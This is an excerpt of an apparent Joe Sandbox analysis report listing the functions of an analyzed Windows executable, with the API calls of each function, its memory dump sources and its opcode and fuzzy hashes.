                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                  • String ID:
                                  • API String ID: 1120388591-0
                                  • Opcode ID: 9c03ae3949557c4a266ef046d784e6c5e50b066aa08dfd99d2e8eceb9ee762cc
                                  • Instruction ID: 1fbdbe1543eb3433ad060ff3d9f1264ca7a9e2de06870735acfc51a7255b2b19
                                  • Opcode Fuzzy Hash: 9c03ae3949557c4a266ef046d784e6c5e50b066aa08dfd99d2e8eceb9ee762cc
                                  • Instruction Fuzzy Hash: 1A819E31218241EFC716DF24D881E2ABBE9FF84308F15895DF4558B2A2DB31ED45CB92
                                  Function 003AF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VariantInit.OLEAUT32(00000035), ref: 003AF7B9
                                  • SysAllocString.OLEAUT32(00000001), ref: 003AF860
                                  • VariantCopy.OLEAUT32(003AFA64,00000000), ref: 003AF889
                                  • VariantClear.OLEAUT32(003AFA64), ref: 003AF8AD
                                  • VariantCopy.OLEAUT32(003AFA64,00000000), ref: 003AF8B1
                                  • VariantClear.OLEAUT32(?), ref: 003AF8BB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Variant$ClearCopy$AllocInitString
                                  • String ID:
                                  • API String ID: 3859894641-0
                                  • Opcode ID: 2ad7fe63975c1a2896f01ef841d1c02aa79ec108d272e12d6a7879d52408450d
                                  • Instruction ID: 4a44c6d6a278c8a92eeb5f69e2dbb753ecb849862e0e7f597837d2dac813ab15
                                  • Opcode Fuzzy Hash: 2ad7fe63975c1a2896f01ef841d1c02aa79ec108d272e12d6a7879d52408450d
                                  • Instruction Fuzzy Hash: 4351C631500310FFCF26ABA5D895B2AB3ACEF46310F24956BE805DF296DB749C41CB96
                                  Function 003C910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00357620: _wcslen.LIBCMT ref: 00357625
                                    • Part of subcall function 00356B57: _wcslen.LIBCMT ref: 00356B6A
                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 003C94E5
                                  • _wcslen.LIBCMT ref: 003C9506
                                  • _wcslen.LIBCMT ref: 003C952D
                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 003C9585
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen$FileName$OpenSave
                                  • String ID: X
                                  • API String ID: 83654149-3081909835
                                  • Opcode ID: 509933fd5cd1d5dea180783de8dcc23a716832bcccda8965f678d063f912c2eb
                                  • Instruction ID: 5457bd1af9c05d0ce31086a72754f6794a4ed07b5a7bca11a925894aae1ab397
                                  • Opcode Fuzzy Hash: 509933fd5cd1d5dea180783de8dcc23a716832bcccda8965f678d063f912c2eb
                                  • Instruction Fuzzy Hash: 57E18035604340DFC726DF24C885F6AB7E4BF85314F06896EE8899B2A2DB31DD05CB92
                                  Function 0036920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00369BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00369BB2
                                  • BeginPaint.USER32(?,?,?), ref: 00369241
                                  • GetWindowRect.USER32(?,?), ref: 003692A5
                                  • ScreenToClient.USER32(?,?), ref: 003692C2
                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 003692D3
                                  • EndPaint.USER32(?,?,?,?,?), ref: 00369321
                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003A71EA
                                    • Part of subcall function 00369339: BeginPath.GDI32(00000000), ref: 00369357
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                  • String ID:
                                  • API String ID: 3050599898-0
                                  • Opcode ID: 590afa25c89ac1eba340fb8e2c730d9a2ad962adff18de0a0fdf57ac593adc75
                                  • Instruction ID: eaf054eb2c0f52c8c3053254da957868040f21be3a90c7f1b5a311ee3c561842
                                  • Opcode Fuzzy Hash: 590afa25c89ac1eba340fb8e2c730d9a2ad962adff18de0a0fdf57ac593adc75
                                  • Instruction Fuzzy Hash: 3641AE70204340AFD722DF24CCD5FAA7BACEB5A320F14466AF9948B2F1C7309846DB61
                                  Function 003C07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 003C080C
                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 003C0847
                                  • EnterCriticalSection.KERNEL32(?), ref: 003C0863
                                  • LeaveCriticalSection.KERNEL32(?), ref: 003C08DC
                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 003C08F3
                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 003C0921
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                  • String ID:
                                  • API String ID: 3368777196-0
                                  • Opcode ID: cd716a7fb3bd7d4576540e6b797b8d69a36ae80678e5ab6cbb8e9e253eaa5e2c
                                  • Instruction ID: 26349b3e609ea19bf4c9e18981cfae303693d488b978d2ee6a1cb542433c69ea
                                  • Opcode Fuzzy Hash: cd716a7fb3bd7d4576540e6b797b8d69a36ae80678e5ab6cbb8e9e253eaa5e2c
                                  • Instruction Fuzzy Hash: F5415971900205EFDF16AF54DC85AAABBB8FF04300F1480A9ED04DE29AD731DE61DBA4
                                  Function 003E81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,003AF3AB,00000000,?,?,00000000,?,003A682C,00000004,00000000,00000000), ref: 003E824C
                                  • EnableWindow.USER32(00000000,00000000), ref: 003E8272
                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 003E82D1
                                  • ShowWindow.USER32(00000000,00000004), ref: 003E82E5
                                  • EnableWindow.USER32(00000000,00000001), ref: 003E830B
                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003E832F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$Show$Enable$MessageSend
                                  • String ID:
                                  • API String ID: 642888154-0
                                  • Opcode ID: 19f8d8517719b83e860c85cd4ad99d87671a59b20cc829568b95193e2e0e1d58
                                  • Instruction ID: 077efd0e877a011df76ee3868c1441e7677d633dfc3ebb6454026df35569a3b8
                                  • Opcode Fuzzy Hash: 19f8d8517719b83e860c85cd4ad99d87671a59b20cc829568b95193e2e0e1d58
                                  • Instruction Fuzzy Hash: 99417474A01694AFDB26CF16C895BA47BE0BB06714F195365E60C5F2F2CB325842CB54
                                  Function 003B4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 003B4C95
                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003B4CB2
                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003B4CEA
                                  • _wcslen.LIBCMT ref: 003B4D08
                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003B4D10
                                  • _wcsstr.LIBVCRUNTIME ref: 003B4D1A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                  • String ID:
                                  • API String ID: 72514467-0
                                  • Opcode ID: c8d784a36c2384fbb92047549e6da3139e4b04590630df9d4b51b91be9b78362
                                  • Instruction ID: 974ca775408d6664cccf41e032f8ceac3fd6571ea572af8f2a567b88ce5e8860
                                  • Opcode Fuzzy Hash: c8d784a36c2384fbb92047549e6da3139e4b04590630df9d4b51b91be9b78362
                                  • Instruction Fuzzy Hash: 5321D7326042407BEB275B29AC49EBFBFACDF45754F15802DF905CE193EA61DC0196A4
                                  Function 003C581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00353AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00353A97,?,?,00352E7F,?,?,?,00000000), ref: 00353AC2
                                  • _wcslen.LIBCMT ref: 003C587B
                                  • CoInitialize.OLE32(00000000), ref: 003C5995
                                  • CoCreateInstance.OLE32(003EFCF8,00000000,00000001,003EFB68,?), ref: 003C59AE
                                  • CoUninitialize.OLE32 ref: 003C59CC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                  • String ID: .lnk
                                  • API String ID: 3172280962-24824748
                                  • Opcode ID: 1219f71fd72681d95baef8cb62e7dcf2d547b918c05de634b8cb88dd5ee7ec54
                                  • Instruction ID: 9037111a5895c7450baa72b2d7fc432e21c75771626bd2100605c94314f4a161
                                  • Opcode Fuzzy Hash: 1219f71fd72681d95baef8cb62e7dcf2d547b918c05de634b8cb88dd5ee7ec54
                                  • Instruction Fuzzy Hash: 6DD163756047019FC716DF24C480E2ABBE5EF89710F11899DF88ADB261DB31EC85CB92
                                  Function 003B175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003B0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003B0FCA
                                    • Part of subcall function 003B0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003B0FD6
                                    • Part of subcall function 003B0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003B0FE5
                                    • Part of subcall function 003B0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003B0FEC
                                    • Part of subcall function 003B0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003B1002
                                  • GetLengthSid.ADVAPI32(?,00000000,003B1335), ref: 003B17AE
                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003B17BA
                                  • HeapAlloc.KERNEL32(00000000), ref: 003B17C1
                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 003B17DA
                                  • GetProcessHeap.KERNEL32(00000000,00000000,003B1335), ref: 003B17EE
                                  • HeapFree.KERNEL32(00000000), ref: 003B17F5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                  • String ID:
                                  • API String ID: 3008561057-0
                                  • Opcode ID: 904bfa65809ed5404e61bee84f0a2d4e698b75aff3fb098ccfde7177040d8d2c
                                  • Instruction ID: d8719899f55456bc44e385cb358be63b649e0a5688376559622794347f08391c
                                  • Opcode Fuzzy Hash: 904bfa65809ed5404e61bee84f0a2d4e698b75aff3fb098ccfde7177040d8d2c
                                  • Instruction Fuzzy Hash: DA11B132510205FFDB22DFA4CC9ABEF7BADEB42359F504118F5419B150CB359941CB60
                                  Function 003B14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003B14FF
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 003B1506
                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003B1515
                                  • CloseHandle.KERNEL32(00000004), ref: 003B1520
                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003B154F
                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 003B1563
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                  • String ID:
                                  • API String ID: 1413079979-0
                                  • Opcode ID: fbf00ad2ed3886454948ed388f7705e0877bcfc10487cac4677438d91cbe8129
                                  • Instruction ID: 5d0c9d2165502382cc61e63c7b62d7e3d38aaf05cd2730da0b04e313834d925a
                                  • Opcode Fuzzy Hash: fbf00ad2ed3886454948ed388f7705e0877bcfc10487cac4677438d91cbe8129
                                  • Instruction Fuzzy Hash: 5E11147250024DABDB22CFA8DD89BDE7BADEB49748F054125FA05A60A0C375CE61DB60
                                  Function 00373382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00373379,00372FE5), ref: 00373390
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0037339E
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003733B7
                                  • SetLastError.KERNEL32(00000000,?,00373379,00372FE5), ref: 00373409
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorLastValue___vcrt_
                                  • String ID:
                                  • API String ID: 3852720340-0
                                  • Opcode ID: 9d0ac43c4c0a7ff6012f75d9d6550c1c6c6fd5782b18368f2248aeac7c686d69
                                  • Instruction ID: 693d6b56635185e9841162757f4a3b934c32abf5f774454631cee2c1b4cac38e
                                  • Opcode Fuzzy Hash: 9d0ac43c4c0a7ff6012f75d9d6550c1c6c6fd5782b18368f2248aeac7c686d69
                                  • Instruction Fuzzy Hash: B1012436249311BEA63727B57CC59AB2F99EB09379730C339F418891F0EF294E027648
                                  Function 00382D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00385686,00393CD6,?,00000000,?,00385B6A,?,?,?,?,?,0037E6D1,?,00418A48), ref: 00382D78
                                  • _free.LIBCMT ref: 00382DAB
                                  • _free.LIBCMT ref: 00382DD3
                                  • SetLastError.KERNEL32(00000000,?,?,?,?,0037E6D1,?,00418A48,00000010,00354F4A,?,?,00000000,00393CD6), ref: 00382DE0
                                  • SetLastError.KERNEL32(00000000,?,?,?,?,0037E6D1,?,00418A48,00000010,00354F4A,?,?,00000000,00393CD6), ref: 00382DEC
                                  • _abort.LIBCMT ref: 00382DF2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorLast$_free$_abort
                                  • String ID:
                                  • API String ID: 3160817290-0
                                  • Opcode ID: 8b00e94fe49536bcb3785e307340b2e29d61fca8dcead88a5cb1bf5542deb2b4
                                  • Instruction ID: a7e09080ca2142570fbc64d2e068b302c9aac31e8bf923d6dcb20a56abee785a
                                  • Opcode Fuzzy Hash: 8b00e94fe49536bcb3785e307340b2e29d61fca8dcead88a5cb1bf5542deb2b4
                                  • Instruction Fuzzy Hash: D4F0C83A64570077C6233738BC46E5F295DAFC27A1F364598F8349A2D2EF2898064760
                                  Function 003E8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00369639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00369693
                                    • Part of subcall function 00369639: SelectObject.GDI32(?,00000000), ref: 003696A2
                                    • Part of subcall function 00369639: BeginPath.GDI32(?), ref: 003696B9
                                    • Part of subcall function 00369639: SelectObject.GDI32(?,00000000), ref: 003696E2
                                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 003E8A4E
                                  • LineTo.GDI32(?,00000003,00000000), ref: 003E8A62
                                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 003E8A70
                                  • LineTo.GDI32(?,00000000,00000003), ref: 003E8A80
                                  • EndPath.GDI32(?), ref: 003E8A90
                                  • StrokePath.GDI32(?), ref: 003E8AA0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                  • String ID:
                                  • API String ID: 43455801-0
                                  • Opcode ID: 78db48ec856f7433ab7f18cb0050326e54e20e3af9f84ccc7b6a280e07367bfa
                                  • Instruction ID: d5a573e84a9eef270da0cd81d227c4758db5592777b1dab192b413792b326728
                                  • Opcode Fuzzy Hash: 78db48ec856f7433ab7f18cb0050326e54e20e3af9f84ccc7b6a280e07367bfa
                                  • Instruction Fuzzy Hash: F5110C7600019CFFDF129F90DC88E9A7F6CEB08354F008122FA199A1A1C7719D56DB60
                                  Function 003B51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetDC.USER32(00000000), ref: 003B5218
